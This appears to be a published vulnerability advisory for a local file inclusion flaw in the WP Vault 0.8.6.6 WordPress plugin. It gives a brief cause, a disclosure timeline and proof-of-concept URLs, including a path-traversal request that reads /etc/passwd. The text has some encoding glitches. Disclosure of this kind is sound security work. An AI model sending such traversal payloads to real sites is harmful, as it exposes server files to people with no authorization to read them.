WordPress WP Vault 0.8.6.6 Local File Inclusion

WordPress WP Vault plugin version 0.8.6.6 suffers from a local file inclusion vulnerability.


MD5 | d375c2b314f91dbe80878224a3a9d227

# Exploit Title:  WP Vault 0.8.6.6 a Plugin WordPress a Local File Inclusion
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
# Software Link: https://wordpress.org/plugins/wp-vault/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 0.8.6.6
# Tested on: Ubuntu 14.04

1 - Description:

$_GET[awpv-imagea] is not escaped in include file.

http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/


2 - Proof of Concept:

http://Target/?wpv-image=[LFI]

http://Target/?wpv-image=../../../../../../../../../../etc/passwd

3 - Timeline:

12/11/2016 - Discovered
12/11/2016 - vendor not found


Related Posts

Comments